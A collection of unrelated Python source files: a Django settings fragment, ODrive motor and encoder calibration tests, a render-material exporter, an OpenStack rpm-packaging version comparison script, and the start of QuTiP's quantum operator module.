'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
)
ROOT_URLCONF = 'timecounter.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
# 'builtins': ['dashboard.templatetags.custom_tag']
},
},
]
WSGI_APPLICATION = 'timecounter.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(levelname)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
}
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'logging.NullHandler'
},
'console_debug': {
'level': 'DEBUG',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'console': {
'level': 'INFO',
'filters': ['require_debug_false'],
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'access_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': BASE_DIR + '/logs/access.log',
'formatter': 'verbose'
},
'error_file': {
'level': 'WARN',
'class': 'logging.FileHandler',
'filename': BASE_DIR + '/logs/error.log',
'formatter': 'verbose'
}
},
'loggers': {
# 'core.handlers': {
# 'level': 'DEBUG',
# 'handlers': ['console', 'console_debug']
# },
'': {
'level': 'INFO',
'handlers': ['console', 'console_debug', 'error_file'],
'propagate': False
},
'django': {
'handlers': ['console', 'console_debug', 'error_file'],
'propagate': False
},
'django.request': {
'level': 'DEBUG',
'handlers': ['console_debug', 'access_file'],
'propagate': False
},
'main': {
'level': 'DEBUG',
'handlers': ['console_debug', 'console'],
'propagate': False
}
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.abspath(os.path.join(BASE_DIR, '..', 'media'))
STATIC_ROOT = os.path.abspath(os.path.join(BASE_DIR, '..', 'static'))
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
from django.template.base import add_to_builtins
add_to_builtins('local_core.templatetags.custom_tags')
| |
import test_runner
import time
from math import pi
import os
from fibre.utils import Logger
from test_runner import *
from odrive.enums import *
class TestMotorCalibration():
"""
Runs the motor calibration (phase inductance and phase resistance measurement)
and checks if the measurements match the expectation.
"""
def get_test_cases(self, testrig: TestRig):
"""Returns all axes that are connected to a motor, along with the corresponding motor(s)"""
for axis in testrig.get_components(ODriveAxisComponent):
for motor, tf in testrig.get_connected_components({'phases': axis}, MotorComponent):
yield (axis, motor, tf)
def run_test(self, axis_ctx: ODriveAxisComponent, motor_ctx: MotorComponent, logger: Logger):
# reset old calibration values
axis_ctx.parent.erase_config_and_reboot()
#if axis_ctx.handle.encoder.config.mode != ENCODER_MODE_INCREMENTAL:
# axis_ctx.handle.encoder.config.mode = ENCODER_MODE_INCREMENTAL
# axis_ctx.parent.save_config_and_reboot()
axis_ctx.handle.motor.config.phase_resistance = 0.0
axis_ctx.handle.motor.config.phase_inductance = 0.0
axis_ctx.handle.motor.config.pre_calibrated = False
axis_ctx.handle.config.enable_watchdog = False
axis_ctx.parent.handle.config.dc_max_negative_current = -1.0
axis_ctx.parent.handle.clear_errors()
# run calibration
request_state(axis_ctx, AXIS_STATE_MOTOR_CALIBRATION)
time.sleep(6)
test_assert_eq(axis_ctx.handle.current_state, AXIS_STATE_IDLE)
test_assert_no_error(axis_ctx)
# check if measurements match expectation
test_assert_eq(axis_ctx.handle.motor.config.phase_resistance, float(motor_ctx.yaml['phase-resistance']), accuracy=0.2)
test_assert_eq(axis_ctx.handle.motor.config.phase_inductance, float(motor_ctx.yaml['phase-inductance']), accuracy=0.5)
test_assert_eq(axis_ctx.handle.motor.is_calibrated, True)
class TestDisconnectedMotorCalibration():
"""
Tests if the motor calibration fails as expected if the phases are floating.
"""
def get_test_cases(self, testrig: TestRig):
"""Returns all axes that are disconnected"""
for axis in testrig.get_components(ODriveAxisComponent):
if axis.yaml == 'floating':
yield (axis, None)
def run_test(self, axis_ctx: ODriveAxisComponent, logger: Logger):
axis = axis_ctx.handle
# reset old calibration values
axis_ctx.handle.motor.config.phase_resistance = 0.0
axis_ctx.handle.motor.config.phase_inductance = 0.0
axis_ctx.handle.motor.config.pre_calibrated = False
axis_ctx.parent.handle.clear_errors()
# run test
request_state(axis_ctx, AXIS_STATE_MOTOR_CALIBRATION)
time.sleep(6)
test_assert_eq(axis_ctx.handle.current_state, AXIS_STATE_IDLE)
test_assert_eq(axis_ctx.handle.motor.error, MOTOR_ERROR_PHASE_RESISTANCE_OUT_OF_RANGE)
class TestEncoderDirFind():
"""
Runs the encoder index search.
"""
def get_test_cases(self, testrig: TestRig):
return testrig.get_closed_loop_combos(init=False)
def run_test(self, axis_ctx: ODriveAxisComponent, motor_ctx: MotorComponent, enc_ctx: EncoderComponent, logger: Logger):
axis = axis_ctx.handle
time.sleep(1.0) # wait for PLLs to stabilize
# Set motor calibration values
axis_ctx.handle.motor.config.phase_resistance = float(motor_ctx.yaml['phase-resistance'])
axis_ctx.handle.motor.config.phase_inductance = float(motor_ctx.yaml['phase-inductance'])
axis_ctx.handle.motor.config.pre_calibrated = True
# Set calibration settings
axis_ctx.handle.encoder.config.direction = 0
axis_ctx.handle.config.calibration_lockin.vel = 12.566 # 2 electrical revolutions per second
axis_ctx.parent.handle.clear_errors()
# run test
request_state(axis_ctx, AXIS_STATE_ENCODER_DIR_FIND)
time.sleep(4) # actual calibration takes 3 seconds
test_assert_eq(axis_ctx.handle.current_state, AXIS_STATE_IDLE)
test_assert_no_error(axis_ctx)
test_assert_eq(axis_ctx.handle.encoder.config.direction in [-1, 1], True)
class TestEncoderOffsetCalibration():
"""
Runs the encoder index search.
"""
def get_test_cases(self, testrig: TestRig):
return testrig.get_closed_loop_combos(init=False)
def run_test(self, axis_ctx: ODriveAxisComponent, motor_ctx: MotorComponent, enc_ctx: EncoderComponent, logger: Logger):
axis = axis_ctx.handle
time.sleep(1.0) # wait for PLLs to stabilize
# Set motor calibration values
axis_ctx.handle.motor.config.phase_resistance = float(motor_ctx.yaml['phase-resistance'])
axis_ctx.handle.motor.config.phase_inductance = float(motor_ctx.yaml['phase-inductance'])
axis_ctx.handle.motor.config.pre_calibrated = True
# Set calibration settings
axis_ctx.handle.encoder.config.direction = 0
axis_ctx.handle.encoder.config.use_index = False
axis_ctx.handle.encoder.config.calib_scan_omega = 12.566 # 2 electrical revolutions per second
axis_ctx.handle.encoder.config.calib_scan_distance = 50.265 # 8 revolutions
axis_ctx.parent.handle.clear_errors()
# run test
request_state(axis_ctx, AXIS_STATE_ENCODER_OFFSET_CALIBRATION)
time.sleep(9.1) # actual calibration takes 9.0 seconds
test_assert_eq(axis_ctx.handle.current_state, AXIS_STATE_IDLE)
test_assert_no_error(axis_ctx)
test_assert_eq(axis_ctx.handle.encoder.is_ready, True)
test_assert_eq(axis_ctx.handle.encoder.config.direction in [-1, 1], True)
class TestEncoderIndexSearch():
"""
Runs the encoder index search.
The index pin is triggered manually after three seconds from the testbench
host's GPIO.
"""
def get_test_cases(self, testrig: TestRig):
for axis, motor, encoder, tf1 in testrig.get_closed_loop_combos(init=False):
alternatives = []
for z_gpio, tf2 in testrig.get_connected_components((axis.parent.encoders[axis.num].z, False), LinuxGpioComponent):
alternatives.append((axis, motor, encoder, z_gpio, TestFixture.all_of(tf1, tf2)))
yield AnyTestCase(*alternatives)
def run_test(self, axis_ctx: ODriveAxisComponent, motor_ctx: MotorComponent, enc_ctx: EncoderComponent, z_gpio: LinuxGpioComponent, logger: Logger):
axis = axis_ctx.handle
cpr = int(enc_ctx.yaml['cpr'])
z_gpio.config(output=True)
z_gpio.write(False)
time.sleep(1.0) # wait for PLLs to stabilize
# Set motor calibration values
axis_ctx.handle.motor.config.phase_resistance = float(motor_ctx.yaml['phase-resistance'])
axis_ctx.handle.motor.config.phase_inductance = float(motor_ctx.yaml['phase-inductance'])
axis_ctx.handle.motor.config.pre_calibrated = True
# Set calibration settings
axis_ctx.handle.config.calibration_lockin.vel = 12.566 # 2 electrical revolutions per second
axis_ctx.parent.handle.clear_errors()
# run test
request_state(axis_ctx, AXIS_STATE_ENCODER_INDEX_SEARCH)
time.sleep(3)
test_assert_eq(axis_ctx.handle.encoder.index_found, False)
time.sleep(0.1)
z_gpio.write(True)
test_assert_eq(axis_ctx.handle.encoder.index_found, True)
z_gpio.write(False)
test_assert_eq(axis_ctx.handle.current_state, AXIS_STATE_IDLE)
test_assert_no_error(axis_ctx)
test_assert_eq(axis_ctx.handle.encoder.shadow_count, 0.0, range=50)
test_assert_eq(modpm(axis_ctx.handle.encoder.count_in_cpr, cpr), 0.0, range=50)
test_assert_eq(axis_ctx.handle.encoder.pos_estimate, 0.0, range=50)
test_assert_eq(modpm(axis_ctx.handle.encoder.pos_cpr_counts, cpr), 0.0, range=50)
test_assert_eq(axis_ctx.handle.encoder.pos_abs, 0.0, range=50)
tests = [
TestMotorCalibration(),
TestDisconnectedMotorCalibration(),
TestEncoderDirFind(),
TestEncoderOffsetCalibration(),
TestEncoderIndexSearch()
]
if __name__ == '__main__':
test_runner.run(tests)
| |
from . import colexport
from . import iorexport
def getRefl(operator, op, name, default):
if name in op.parameters:
return colexport.unpackRefl(operator, op.parameters[name])
else:
return colexport.unpackRefl(operator, default)
def getIOR(operator, op, name, default):
if name in op.parameters:
return iorexport.unpackIOR(operator, op.parameters[name])
else:
return iorexport.unpackIOR(operator, default)
def getK(operator, op, name, default):
if name in op.parameters:
return iorexport.unpackK(operator, op.parameters[name])
else:
return iorexport.unpackK(operator, default)
def getScal(operator, op, name, default, doSqrt=False):
val = op.parameters.get(name, default)
if isinstance(val, str):
return "(texture '%s')" % val # What if doSqrt?
elif isinstance(val, list):
return str(sum(val) / len(val)) # TODO:
else:
return str(val)
def getRoughness(operator, op):
if "uroughness" in op.parameters and "vroughness" in op.parameters:
roughness_x = getScal(operator, op, 'uroughness', 0)
roughness_y = getScal(operator, op, 'vroughness', 0)
elif "uroughness" in op.parameters:
roughness_x = getScal(operator, op, 'uroughness', 0)
roughness_y = roughness_x
elif "roughness" in op.parameters:
roughness_x = getScal(operator, op, 'roughness', 0)
roughness_y = roughness_x
else:
return None
return (roughness_x, roughness_y)
def export(operator, op, isNamed):
if isNamed:
mat_type = op.parameters.get('type', 'NONE')
name = op.operand
else:
mat_type = op.operand
name = "material_%i" % operator.matCount
if mat_type == "matte":
color = getRefl(operator, op, 'Kd', [1, 1, 1])
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'diffuse'")
operator.w.write(":name '%s'" % name)
operator.w.write(":albedo %s" % color)
operator.w.goOut()
operator.w.write(")")
elif mat_type == "glass":
color = getRefl(operator, op, 'Ks', [1, 1, 1])
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'glass'")
operator.w.write(":name '%s'" % name)
operator.w.write(":specularity %s" % color)
operator.w.write(":index %s" % getIOR(operator, op, 'eta', 'bk7'))
roughness = getRoughness(operator, op)
if roughness is not None:
if roughness[0] != roughness[1]:
operator.w.write(":roughness_x %s" % roughness[0])
operator.w.write(":roughness_y %s" % roughness[1])
else:
operator.w.write(":roughness %s" % roughness[0])
operator.w.goOut()
operator.w.write(")")
elif mat_type == "metal":
eta = getIOR(operator, op, 'eta', 'copper')
k = getK(operator, op, 'k', 'copper')
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'conductor'")
operator.w.write(":name '%s'" % name)
operator.w.write(":eta %s" % eta)
operator.w.write(":k %s" % k)
roughness = getRoughness(operator, op)
if roughness is not None:
if roughness[0] != roughness[1]:
operator.w.write(":roughness_x %s" % roughness[0])
operator.w.write(":roughness_y %s" % roughness[1])
else:
operator.w.write(":roughness %s" % roughness[0])
operator.w.goOut()
operator.w.write(")")
elif mat_type == "mirror":
color = getRefl(operator, op, 'Kr', [1, 1, 1])
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'mirror'")
operator.w.write(":name '%s'" % name)
operator.w.write(":specularity %s" % color)
operator.w.goOut()
operator.w.write(")")
elif mat_type == "substrate":
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'principled'")
operator.w.write(":name '%s'" % name)
operator.w.write(":base %s" % getRefl(
operator, op, 'Kd', [0.5, 0.5, 0.5])) # TODO
#operator.w.write(":specular %s" % getScal(operator, op, 'Ks', 0.5))
operator.w.write(":index %s" % getIOR(operator, op, 'eta', 'bk7'))
roughness = getRoughness(operator, op)
if roughness is not None:
if roughness[0] != roughness[1]: # TODO
operator.w.write(":roughness_x %s" % roughness[0])
operator.w.write(":roughness_y %s" % roughness[1])
else:
operator.w.write(":roughness %s" % roughness[0])
operator.w.goOut()
operator.w.write(")")
elif mat_type == "disney":
color = getRefl(operator, op, 'color', [1, 1, 1])
eta = getRefl(operator, op, 'eta', 1)
spec = ((eta - 1) / (eta + 1))**2
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'principled'")
operator.w.write(":name '%s'" % name)
operator.w.write(":base %s" % color)
operator.w.write(":roughness %s" %
getScal(operator, op, 'roughness', 0.5))
operator.w.write(":specular %s" % spec)
operator.w.write(":specular_tint %s" %
getScal(operator, op, 'speculartint', 0))
operator.w.write(":metallic %s" % getScal(operator, op, 'metallic', 0))
operator.w.write(":clearcoat %s" %
getScal(operator, op, 'clearcoat', 0))
operator.w.write(":clearcoat_gloss %s" %
getScal(operator, op, 'clearcoatgloss', 0))
operator.w.write(":anisotropic %s" %
getScal(operator, op, 'anisotropic', 0))
operator.w.write(":sheen %s" % getScal(operator, op, 'sheen', 0))
operator.w.write(":sheen_tint %s" %
getScal(operator, op, 'sheentint', 0))
# TODO: 'spectrans', 'scatterdistance' ?
operator.w.goOut()
operator.w.write(")")
elif mat_type == "uber":
print("WARNING: 'uber' material will be approximated!")
diff = getRefl(operator, op, 'Kd', [0.25, 0.25, 0.25])
spec = getRefl(operator, op, 'Ks', [0.25, 0.25, 0.25])
refl = getRefl(operator, op, 'Kr', [0, 0, 0])
tran = getRefl(operator, op, 'Kt', [0, 0, 0])
opacity = getScal(operator, op, 'opacity', 1)
eta = getIOR(operator, op, 'eta', 1.55)
hasOpacity = "opacity" in op.parameters
hasGlass = "Kr" in op.parameters or "Kt" in op.parameters
# Opacity material
if hasOpacity:
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'null'")
operator.w.write(":name '%s-opacity'" % name)
operator.w.goOut()
operator.w.write(")")
# Glass material
if hasGlass:
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'glass'")
operator.w.write(":name '%s-glass'" % name)
operator.w.write(":specular %s" % spec)
operator.w.write(":transmission (smul %s %s)" % (tran, spec))
operator.w.write(":index %s" % eta)
operator.w.goOut()
operator.w.write(")")
# Diffuse material
diffName = "%s-diff" % name if hasOpacity or hasGlass else name
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'diffuse'")
operator.w.write(":name '%s'" % diffName)
operator.w.write(":albedo %s" % diff)
operator.w.goOut()
operator.w.write(")")
# Combine glass with diffuse
if hasGlass:
in1 = "%s-mix" % name
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'blend'")
operator.w.write(":name '%s'" % in1)
operator.w.write(":material1 '%s'" % diffName)
operator.w.write(":material2 '%s-glass'" % name)
operator.w.write(":factor %s" % refl)
operator.w.goOut()
operator.w.write(")")
else:
in1 = diffName
# Combine opacity with diffuse or mix of glass and diffuse
if hasOpacity:
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'blend'")
operator.w.write(":name '%s'" % name)
operator.w.write(":material1 '%s-opacity'" % name)
operator.w.write(":material2 '%s'" % in1)
operator.w.write(":factor %s" % opacity)
operator.w.goOut()
operator.w.write(")")
elif mat_type == "mix":
mat1 = op.parameters.get("namedmaterial1", "")
mat2 = op.parameters.get("namedmaterial2", "")
fac = getScal(operator, op, 'amount', 0.5)
operator.w.write("(material")
operator.w.goIn()
operator.w.write(":type 'mix'")
operator.w.write(":name '%s'" % name)
operator.w.write(":material1 '%s'" % mat1)
operator.w.write(":material2 '%s'" % mat2)
operator.w.write(":factor %s" % fac)
operator.w.goOut()
operator.w.write(")")
else:
print("ERROR: No support of materials of type %s for %s available" %
(mat_type, name))
operator.matCount += 1
return name
| |
#!/usr/bin/python3
# Copyright (c) 2016 SUSE Linux GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from collections import namedtuple
import os
from packaging import version
from packaging.requirements import Requirement
import re
import requests
import sys
import yaml
import json
# the current 'in development' release
CURRENT_MASTER = 'xena'
# the host where to query for open reviews
GERRIT_HOST = 'https://review.opendev.org'
V = namedtuple('V', ['release', 'upper_constraints', 'rpm_packaging_pkg',
'reviews', 'obs_published'])
def _process_status(args=None):
projects = {}
upper_constraints = read_upper_constraints(
os.path.join(args['requirements-git-dir'], 'upper-constraints.txt'))
# open reviews for the given release
open_reviews = _gerrit_open_reviews_per_file(args['release'])
# directory which contains all yaml files from the openstack/release
# git dir
releases_yaml_dir = os.path.join(args['releases-git-dir'], 'deliverables',
args['release'])
releases_indep_yaml_dir = os.path.join(args['releases-git-dir'],
'deliverables', '_independent')
yaml_files = [os.path.join(releases_indep_yaml_dir, f)
for f in os.listdir(releases_indep_yaml_dir)]
yaml_files += [os.path.join(releases_yaml_dir, f)
for f in os.listdir(releases_yaml_dir)]
for yaml_file in yaml_files:
project_name = re.sub(r'\.ya?ml$', '', os.path.basename(yaml_file))
# skip projects if include list is given
if len(args['include_projects']) and \
project_name not in args['include_projects']:
continue
with open(yaml_file) as f:
data = yaml.load(f.read())
if 'releases' not in data or not data['releases']:
# there might be yaml files without any releases
continue
v_release = find_highest_release_version(data['releases'])
# use tarball-base name if available
project_name_pkg = v_release['projects'][0].get('tarball-base',
project_name)
# get version from upper-constraints.txt
if project_name in upper_constraints:
v_upper_constraints = upper_constraints[project_name]
else:
v_upper_constraints = '-'
# path to the corresponding .spec.j2 file
rpm_packaging_pkg_project_spec = os.path.join(
args['rpm-packaging-git-dir'],
'openstack', project_name_pkg,
'%s.spec.j2' % project_name_pkg)
v_rpm_packaging_pkg = find_rpm_packaging_pkg_version(
rpm_packaging_pkg_project_spec)
# version from build service published file
v_obs_published = find_openbuildservice_pkg_version(
args['obs_published_xml'], project_name)
# reviews for the given project
if project_name in open_reviews:
project_reviews = open_reviews[project_name]
else:
project_reviews = []
# add both versions to the project dict
projects[project_name] = V(version.parse(v_release['version']),
v_upper_constraints,
v_rpm_packaging_pkg,
project_reviews,
v_obs_published)
include_obs = args['obs_published_xml']
if args['format'] == 'text':
output_text(args['release'], projects, include_obs)
elif args['format'] == 'html':
output_html(args['release'], projects, include_obs)
def process_args():
parser = argparse.ArgumentParser(
description='Compare rpm-packaging with OpenStack releases')
subparsers = parser.add_subparsers(help='sub-command help')
# subparsers - status
parser_status = subparsers.add_parser('status', help='status help')
parser_status.add_argument('releases-git-dir',
help='Base directory of the openstack/releases '
'git repo', default='releases')
parser_status.add_argument('rpm-packaging-git-dir',
help='Base directory of the '
'openstack/rpm-packaging git repo',
default='rpm-packaging')
parser_status.add_argument('requirements-git-dir',
help='Base directory of the '
'openstack/requirements git repo',
default='requirements')
parser_status.add_argument('--obs-published-xml',
help='path to a published xml file from the '
'openbuildservice')
parser_status.add_argument('release',
help='name of the release. I.e. "mitaka"',
default='mitaka')
parser_status.add_argument('--include-projects', nargs='*',
metavar='project-name', default=[],
help='If non-empty, only the given '
'projects will be checked. '
'default: %(default)s')
parser_status.add_argument('--format',
help='output format', choices=('text', 'html'),
default='text')
parser_status.set_defaults(func=_process_status)
args = parser.parse_args()
args.func(vars(args))
def find_highest_release_version(releases):
"""get a list of dicts with a version key and find the highest version
using PEP440 to compare the different versions"""
return max(releases, key=lambda x: version.parse(str(x['version'])))
def _rpm_split_filename(filename):
"""Taken from yum's rpmUtils.miscutils.py file
Pass in a standard style rpm fullname
Return a name, version, release, epoch, arch, e.g.::
foo-1.0-1.i386.rpm returns foo, 1.0, 1, i386
1:bar-9-123a.ia64.rpm returns bar, 9, 123a, 1, ia64
"""
if filename[-4:] == '.rpm':
filename = filename[:-4]
archIndex = filename.rfind('.')
arch = filename[archIndex+1:]
relIndex = filename[:archIndex].rfind('-')
rel = filename[relIndex+1:archIndex]
verIndex = filename[:relIndex].rfind('-')
ver = filename[verIndex+1:relIndex]
epochIndex = filename.find(':')
if epochIndex == -1:
epoch = ''
else:
epoch = filename[:epochIndex]
name = filename[epochIndex + 1:verIndex]
return name, ver, rel, epoch, arch
def find_openbuildservice_pkg_version(published_xml, pkg_name):
"""find the version in the openbuildservice published xml for the given
pkg name"""
import pymod2pkg
import xml.etree.ElementTree as ET
if published_xml and os.path.exists(published_xml):
with open(published_xml) as f:
tree = ET.fromstring(f.read())
distro_pkg_name = pymod2pkg.module2package(pkg_name, 'suse')
for child in tree:
if not child.attrib['name'].startswith('_') and \
child.attrib['name'].endswith('.rpm') and not \
child.attrib['name'].endswith('.src.rpm'):
(name, ver, release, epoch, arch) = _rpm_split_filename(
child.attrib['name'])
if name == distro_pkg_name:
return version.parse(ver)
return version.parse('0')
def find_rpm_packaging_pkg_version(pkg_project_spec):
"""get a spec.j2 template and get the version"""
if os.path.exists(pkg_project_spec):
with open(pkg_project_spec) as f:
for line in f:
# if the template variable 'upstream_version' is set, use that
m = re.search(
r"{%\s*set upstream_version\s*=\s*(?:upstream_version\()?"
r"'(?P<version>.*)'(?:\))?\s*%}$", line)
if m:
return version.parse(m.group('version'))
# check the Version field
m = re.search(r'^Version:\s*(?P<version>.*)\s*$', line)
if m:
if m.group('version') == '{{ py2rpmversion() }}':
return 'version unset'
return version.parse(m.group('version'))
# no version in spec found
print('ERROR: no version in %s found' % pkg_project_spec)
return version.parse('0')
return version.parse('0')
def _pretty_table(release, projects, include_obs):
from prettytable import PrettyTable
tb = PrettyTable()
fn = ['name',
'release (%s)' % release,
'u-c (%s)' % release,
'rpm packaging (%s)' % release,
'reviews']
if include_obs:
fn += ['obs']
fn += ['comment']
tb.field_names = fn
for p_name, x in projects.items():
if x.rpm_packaging_pkg == 'version unset':
comment = 'ok'
elif x.rpm_packaging_pkg == version.parse('0'):
comment = 'unpackaged'
elif x.rpm_packaging_pkg < x.release:
comment = 'needs upgrade'
elif x.rpm_packaging_pkg == x.release:
if x.upper_constraints != '-' and \
x.release > version.parse(x.upper_constraints):
comment = 'needs downgrade (u-c)'
comment = 'ok'
elif x.rpm_packaging_pkg > x.release:
comment = 'needs downgrade'
else:
comment = ''
row = [p_name, x.release, x.upper_constraints, x.rpm_packaging_pkg,
x.reviews]
if include_obs:
row += [x.obs_published]
row += [comment]
tb.add_row(row)
return tb
def output_text(release, projects, include_obs):
tb = _pretty_table(release, projects, include_obs)
print(tb.get_string(sortby='comment'))
def output_html(release, projects, include_obs):
"""adjust the comment color a big with an ugly hack"""
from lxml import html
tb = _pretty_table(release, projects, include_obs)
s = tb.get_html_string(sortby='comment')
tree = html.document_fromstring(s)
tab = tree.cssselect('table')
tab[0].attrib['style'] = 'border-collapse: collapse;'
trs = tree.cssselect('tr')
for t in trs:
t.attrib['style'] = 'border-bottom:1pt solid black;'
tds = tree.cssselect('td')
for t in tds:
if t.text_content() == 'unpackaged':
t.attrib['style'] = 'background-color:yellow'
elif t.text_content() == 'needs upgrade':
t.attrib['style'] = 'background-color:LightYellow'
elif t.text_content() == ('needs downgrade' or 'needs downgrade (uc)'):
t.attrib['style'] = 'background-color:red'
elif t.text_content() == 'ok':
t.attrib['style'] = 'background-color:green'
print(html.tostring(tree))
def read_upper_constraints(filename):
uc = dict()
with open(filename) as f:
for line in f.readlines():
# ignore markers for now
line = line.split(';')[0]
r = Requirement(line)
for s in r.specifier:
uc[r.name] = s.version
# there is only a single version in upper constraints
break
return uc
def _gerrit_open_reviews_per_file(release):
"""Returns a dict with filename as key and a list of review numbers
where this file is modified as value"""
# NOTE: gerrit has a strange first line in the returned data
gerrit_strip = ')]}\'\n'
data = dict()
if release == CURRENT_MASTER:
branch = 'master'
else:
branch = 'stable/%s' % release
url_reviews = GERRIT_HOST + '/changes/?q=status:open+project:openstack/' \
'rpm-packaging+branch:%s' % branch
res_reviews = requests.get(url_reviews)
if res_reviews.status_code == 200:
data_reviews = json.loads(res_reviews.text.lstrip(gerrit_strip))
for review in data_reviews:
url_files = GERRIT_HOST + '/changes/%s/revisions/current/files/' \
% review['change_id']
res_files = requests.get(url_files)
if res_files.status_code == 200:
data_files = json.loads(res_files.text.lstrip(gerrit_strip))
for f in data_files.keys():
# extract project name
if f.startswith('openstack/') and f.endswith('spec.j2'):
f = f.split('/')[1]
data.setdefault(f, []).append(review['_number'])
return data
def main():
process_args()
return 0
if __name__ == '__main__':
sys.exit(main())
| |
# This file is part of QuTiP: Quantum Toolbox in Python.
#
# Copyright (c) 2011 and later, Paul D. Nation and Robert J. Johansson.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the QuTiP: Quantum Toolbox in Python nor the names
# of its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###############################################################################
"""
This module contains functions for generating Qobj representation of a variety
of commonly occuring quantum operators.
"""
__all__ = ['jmat', 'spin_Jx', 'spin_Jy', 'spin_Jz', 'spin_Jm', 'spin_Jp',
'spin_J_set', 'sigmap', 'sigmam', 'sigmax', 'sigmay', 'sigmaz',
'destroy', 'create', 'qeye', 'identity', 'position', 'momentum',
'num', 'squeeze', 'squeezing', 'displace', 'commutator',
'qutrit_ops', 'qdiags', 'phase', 'qzero', 'enr_destroy',
'enr_identity', 'charge', 'tunneling']
import numpy as np
import scipy
import scipy.sparse as sp
from qutip.qobj import Qobj
from qutip.fastsparse import fast_csr_matrix, fast_identity
#
# Spin operators
#
def jmat(j, *args):
"""Higher-order spin operators:
Parameters
----------
j : float
Spin of operator
args : str
Which operator to return 'x','y','z','+','-'.
If no args given, then output is ['x','y','z']
Returns
-------
jmat : qobj / ndarray
``qobj`` for requested spin operator(s).
Examples
--------
>>> jmat(1)
[ Quantum object: dims = [[3], [3]], \
shape = [3, 3], type = oper, isHerm = True
Qobj data =
[[ 0. 0.70710678 0. ]
[ 0.70710678 0. 0.70710678]
[ 0. 0.70710678 0. ]]
Quantum object: dims = [[3], [3]], \
shape = [3, 3], type = oper, isHerm = True
Qobj data =
[[ 0.+0.j 0.-0.70710678j 0.+0.j ]
[ 0.+0.70710678j 0.+0.j 0.-0.70710678j]
[ 0.+0.j 0.+0.70710678j 0.+0.j ]]
Quantum object: dims = [[3], [3]], \
shape = [3, 3], type = oper, isHerm = True
Qobj data =
[[ 1. 0. 0.]
[ 0. 0. 0.]
[ 0. 0. -1.]]]
Notes
-----
If no 'args' input, then returns array of ['x','y','z'] operators.
"""
if (scipy.fix(2 * j) != 2 * j) or (j < 0):
raise TypeError('j must be a non-negative integer or half-integer')
if not args:
return jmat(j, 'x'), jmat(j, 'y'), jmat(j, 'z')
if args[0] == '+':
A = _jplus(j)
elif args[0] == '-':
A = _jplus(j).getH()
elif args[0] == 'x':
A = 0.5 * (_jplus(j) + _jplus(j).getH())
elif args[0] == 'y':
A = -0.5 * 1j * (_jplus(j) - _jplus(j).getH())
